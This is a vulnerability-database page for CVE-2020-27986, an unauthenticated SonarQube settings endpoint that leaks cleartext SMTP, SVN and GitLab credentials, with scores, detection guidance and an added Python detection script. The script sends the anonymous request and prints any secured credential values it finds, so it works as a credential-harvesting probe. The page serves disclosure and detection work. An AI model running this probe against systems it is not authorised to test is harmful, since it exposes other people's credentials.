cbcvebase.
CVE-2020-27986
published 2020-10-28


Priority: P1 (81)
CVSS 3.1: 7.5 (high)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 16.18% (96.5th percentile)
SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI. NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."

Affected (2 ranges)

Vendor        Product     Version range   Fixed in
gitlab        gitlab      -               -
sonarsource   sonarqube   -               -

Detection & IOCs (extracted from sources)

url: /api/settings/values
other: email.smtp_host.secured
  • Send an unauthenticated HTTP GET request to /api/settings/values (no session cookie and no Authorization header) and inspect the response body for all four strings: 'email.smtp_host.secured', 'email.smtp_password.secured', 'email.smtp_port.secured', and 'email.smtp_username.secured'. Keys carrying the '.secured' suffix are settings SonarQube is meant to withhold from anonymous and non-admin callers, so their presence in an anonymous response is the signature of this issue.
  • A successful exploit returns HTTP 200 with all four SMTP key names in the JSON body, which shows the settings API is reachable without authentication. To confirm actual credential disclosure rather than a bare key listing, read the 'value' field of each matched entry: a non-empty SMTP password, together with any SVN or GitLab '.secured' settings in the same response, is the cleartext exposure the advisory describes. A 401/403 response, or a 200 without the '.secured' keys, means the detection rule is not met.
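The detection rule above, as an added example that is not part of this page and not SonarQube's own code: a small Python script that applies the rule to an HTTP status and response body, separating "endpoint answers anonymously and lists the four SMTP secured keys" from "the listed entries carry non-empty values". The function names assess() and probe(), the sample response bodies, and the assumed JSON shape (a top-level "settings" array whose entries carry "key" and "value" or "values") are this example's own; the sample bodies are constructed, not captured from a real instance.

```python
"""Added example: decide whether a SonarQube /api/settings/values response shows
the CVE-2020-27986 exposure. Not the page's or SonarQube's own code."""
import json
import sys
import urllib.error
import urllib.request

# The four SMTP key names the detection rule on this page matches on.
SMTP_SECURED_KEYS = (
    "email.smtp_host.secured",
    "email.smtp_password.secured",
    "email.smtp_port.secured",
    "email.smtp_username.secured",
)


def assess(status, body):
    """Apply the detection rule to an HTTP status code and a JSON body.

    'vulnerable' follows the page's rule: HTTP 200 plus all four SMTP secured
    keys present. 'cleartext_values' holds every *.secured entry whose value is
    non-empty, which is the actual credential disclosure, SVN/GitLab included.
    """
    result = {"vulnerable": False, "secured_keys": [], "cleartext_values": {}}
    if status != 200:
        return result  # 401/403 etc.: the endpoint is gated, rule not met
    try:
        entries = json.loads(body).get("settings", [])
    except (ValueError, AttributeError):
        return result  # not the settings JSON at all (HTML login page, list, ...)
    for entry in entries:
        key = entry.get("key", "")
        if not key.endswith(".secured"):
            continue
        result["secured_keys"].append(key)
        # Assumed shape: single-valued settings use 'value', multi-valued 'values'.
        value = entry.get("value", entry.get("values"))
        if value not in (None, "", []):
            result["cleartext_values"][key] = value
    result["vulnerable"] = all(k in result["secured_keys"] for k in SMTP_SECURED_KEYS)
    return result


def probe(base_url, timeout=10):
    """Send the anonymous GET (no cookie, no Authorization header) and assess it.

    Assumed helper: base_url is the SonarQube root, e.g. http://host:9000.
    """
    url = base_url.rstrip("/") + "/api/settings/values"
    req = urllib.request.Request(url, headers={"Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return assess(resp.status, resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        # urllib raises on 4xx/5xx; the status still feeds the same rule.
        return assess(err.code, err.read().decode("utf-8", "replace"))


# Constructed sample responses (not captured from a real instance).
SAMPLE_EXPOSED = json.dumps({"settings": [
    {"key": "sonar.forceAuthentication", "value": "false"},
    {"key": "email.smtp_host.secured", "value": "smtp.corp.example"},
    {"key": "email.smtp_port.secured", "value": "587"},
    {"key": "email.smtp_username.secured", "value": "sonar-mailer"},
    {"key": "email.smtp_password.secured", "value": "hunter2"},
    {"key": "sonar.svn.password.secured", "value": "svn-secret"},
]})
SAMPLE_GATED = json.dumps({"settings": [
    {"key": "sonar.forceAuthentication", "value": "true"},
]})

if __name__ == "__main__":
    # Usage: python check_sonar.py http://host:9000  (no argument runs the sample)
    target = sys.argv[1] if len(sys.argv) > 1 else None
    report = probe(target) if target else assess(200, SAMPLE_EXPOSED)
    print(json.dumps(report, indent=2))
```

Run it with a base URL to probe a host you are authorised to test; with no argument it evaluates the constructed sample. The split between 'vulnerable' and 'cleartext_values' is deliberate: the first reproduces the page's signature check, the second is what you quote in a finding.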

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      7.5     HIGH       CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvd         v2.0      5.0     MEDIUM     AV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck   -         7.5     HIGH       -